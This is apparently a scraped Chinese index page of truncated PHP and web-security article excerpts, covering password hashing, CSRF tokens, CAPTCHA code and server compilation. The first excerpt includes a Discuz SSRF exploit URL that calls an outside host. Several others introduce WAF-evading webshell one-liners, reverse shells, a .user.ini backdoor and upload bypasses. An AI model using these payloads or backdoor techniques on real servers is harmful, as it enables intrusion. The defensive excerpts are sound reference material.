Time of Update: 2017-01-13
這個存在漏洞的url是http://bbs.demo.com//forum.php?mod=ajax&action=downremoteimg&message=攻擊者把非法檔案傳入到參數進行SSRF攻擊:http://bbs.demo.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6
Time of Update: 2017-01-13
相信很多人要麼是md5()直接存入庫或者儲存md5()和salt兩個欄位。但第一種不安全。第二種麻煩。好在php提供了更簡單的解決方案。註:以下的前提條件是在php5.5版本中的在php5.5以後,可以換一種存法了。簡單方便。<?php$pwd = "123456";$hash = password_hash($pwd, PASSWORD_BCRYPT);echo $hash;// mysql中就只需要儲存這個hash值就行了。建議把資料庫該欄位值設定為255if
Time of Update: 2017-01-13
Metasploit簡介 灰帽駭客(第3版) Metasploit是一個免費的、可下載的架構,通過它可以很容易地擷取、開發並對電腦軟體漏洞實施攻擊。它本身附帶數百個已知軟體漏洞的專業級漏洞攻擊工具。當H.D.
Time of Update: 2017-01-13
今天在烏雲上看到PHP multipart/form-data 遠程DOS漏洞,馬上給同事聯絡了下對線上伺服器進行打補丁,先給一個centos編譯安裝nginx+php-fpm+mysql的教程,如果是根據我這樣安裝的話,那你們可以繼續按照做下去了,如果不是的話,那麼你們就看看吧. 系統:centos 5.x(64位) 需要的軟體:php-5.2-multipart-form-data.patch1.查看自己php版本php -vPHP 5.2.17p1 (
Time of Update: 2017-01-13
Token淺談Token,就是令牌,最大的特點就是隨機性,不可預測。一般駭客或軟體無法猜測出來。那麼,Token有什麼作用?又是什麼原理呢?Token一般用在兩個地方——防止表單重複提交、anti csrf攻擊(跨網站請求偽造)。兩者在原理上都是通過session
Time of Update: 2017-01-13
最近很多人分享一些過狗過盾的一句話,但無非是用各種方法去構造一些動態函數,比如$_GET['func']($_REQUEST['pass'])之類的方法。萬變不離其宗,但這種方法,雖然狗盾可能看不出來,但人肉眼其實很容易發現這類後門的。 那麼,我就分享一下,一些不需要動態函數、不用eval、不含敏感函數、免殺免攔截的一句話。0x00 前言
Time of Update: 2017-01-13
inux下,有時候拿到webshell需要提權,提權必須要得到一個互動shell。 我看了一下常用的php webshell,對於命令執行、反彈shell都沒有完善的方式。很多webshell裡都沒有proc_popen、popen這兩種方式,特別是proc_popen,比如phpspy。 在我收集的反彈shell集合(http://tool.p1ng.pw/getshell.html)中,有一個方法,就是在命令列中輸入:1
Time of Update: 2017-01-13
相信大家或多或少都用過AMH,Vestacp等vps面板,這些面板都是使用的php語言,從本質上來說就是php執行linux的外部命令。PHP 為執行外部命令提供大量函數,其中包括 shell_exec()、exec()、passthru() 和 system()。這些命令是相似的,但為您啟動並執行外部程式提供不同的介面。所有這些命令都衍生一個子進程,用於運行您指定的命令或指令碼,並且每個子進程會在命令輸出寫到標準輸出 (stdout) 時捕捉它們。shell_exec函數說明:通過
Time of Update: 2017-01-13
PHP程式員如何理解依賴注入容器(dependency injection container)背景知識傳統的思路是應用程式用到一個Foo類,就會建立Foo類並調用Foo類的方法,假如這個方法內需要一個Bar類,就會建立Bar類並調用Bar類的方法,而這個方法內需要一個Bim類,就會建立Bim類,接著做些其它工作。<?php// 代碼【1】class Bim{ public function doSomething()
Time of Update: 2017-01-13
php提供4種方法執行系統外部命令:exec()、passthru()、system()、 shell_exec()。在開始介紹前,先檢查下php設定檔php.ini中是有禁止這是個函數。找到 disable_functions,配置如下:disable_functions =如果“disable_functions=”後面有接上面四個函數,將其刪除。預設php.ini設定檔中是不禁止你調用執行外部命令的函數的。方法一:exec()function
Time of Update: 2017-01-13
隨著html可視即可得編輯器的流行,很多網站使用了這樣的編輯器,比如FCKEditor、百度UEditor編輯器等等。跨站指令碼攻擊(XSS)已經不是什麼新鮮的話題了,甚至很多大公司也為此吃盡苦頭。最簡單直接的防範方法,就是不允許任何html標籤輸入,對使用者輸入進行編碼(htmlencode)。但是如果想使用者輸入支援一些格式,怎麼辦?一種辦法就是很多論壇採用的BB Code的方法。使用特定的標籤代替一些格式。比如:[ B ]表示粗體,等等。但是,BB
Time of Update: 2017-01-13
我使用了一個特殊的圖片上傳技巧,繞過PHP
Time of Update: 2017-01-13
背景這個估計很多同學看了不屑,認為是爛大街的東西了:.htaccess檔案構成的PHP後門,那麼我來個新的吧:.user.ini。它比.htaccess用的更廣,不管是 nginx/apache/IIS,只要是以fastcgi啟動並執行php都可以用這個方法。我的nginx伺服器全部是fpm/fastcgi,我的 IIS
Time of Update: 2017-01-13
安裝破解版的Zend Guard 6.0軟體之後,博主Jhonse哥就嘗試給php檔案加密。第一步: 開啟Zend Guard 6.0軟體 第二步: php檔案加密 1. 建立Zend Guard Project 2. 填寫項目資訊 3. 添加源檔案或者源檔案夾 4.
Time of Update: 2017-01-13
在我們開發登入模組或者是論壇的灌水模組的時候,為了防止惡意提交,需要用到驗證碼。驗證碼就是用來區分人和機器的一種手段,當然這種手段不是萬無一失,但總歸會起到一些作用。驗證碼的實現需要GD庫的支援,沒有開啟GD庫的童鞋需開啟GD庫。其實驗證碼的製作和使用非常的簡單,僅僅只是需要4個步驟就可以搞定:建立驗證碼底圖,顯示驗證碼內容,增加幹擾元素,輸出驗證碼。下面我們來進行步驟拆分:第一步:建立驗證碼底圖$image = imagecreatetruecolor(100, 30); // 建立一個寬為
Time of Update: 2017-01-13
問題: 線上啟動並執行lamp伺服器,預設yum安裝的curl模組只支援http,不支援https。 解決方案: 編譯安裝curl,重新編譯php,使php的curl模組支援https。 具體步驟: 1、下載curl cd /usr/local/src #進入安裝包存放目錄 wget http://curl.haxx.se/download/curl-7.44.0.tar.gz
Time of Update: 2017-01-13
php核心編寫的擴充有兩個工作方式(1). 編譯為動態共用對象/可裝載模組,也就是常見的 .so擴充,這種擴充可以在php的設定檔中方便的開啟或者關閉(2). 靜態編譯到php中,使用靜態編譯方法比較容易上手本文介紹方式第一種方式:編寫或者下載擴充包phpize./configuremakemake install配置php.ini中的.so檔案第二種方式:第一步:編譯安裝php1. ./configure –prefix=/opt/php56/
Time of Update: 2017-01-13
MAMP內建的PHP版本在編譯的時候是沒有加上--enable-debug選項的,於是我打算自己重新編譯一下PHP方便自己在進行PHP擴充研究的時候可以用gdb來查看core dump檔案。首先使用MAMP中的php版本查看phpinfo()得到了MAMP在編譯時間候的參數--more--並且在後面加上了--enable-debug選項sudo './configure' '--with-mysql=mysqlnd' '--with-gd'
Time of Update: 2017-01-13
公司運營的論壇被網路攻擊,無奈沒有很好的解決方案,就只有一個個的封IP地址,最終封了1600多個ip段,2個月後網路攻擊逐步減少,擔心會屏蔽正常使用者,所以開始解鎖一批國內的欄位的ip地址,論壇程式是discuz,由於discuz在禁止ip欄位頁面沒有做分頁功能,其導致1600多個欄位同時讀取在頁面上。問題來了,刪除ip欄位時程式不響應,在記錄數1000條以上,不管是提交一條刪除記錄,還是全部刪除記錄,都是沒效果的。1000條記錄下,刪除功能失效最終在discuz官方論壇管理員協助下解決!&nb
Time of Update: 2017-01-13
PHP編程常用技巧四則: 1.配置PHP檔案目錄 作為伺服器端解釋執行的指令碼語言,PHP程式放置在某個伺服器可以訪問的目錄下,一般可以通過修改Apache的httpd.conj進行配置,例如我們在該檔案中的一句: Alias /test/ "d:brhpwebsitebrhp/"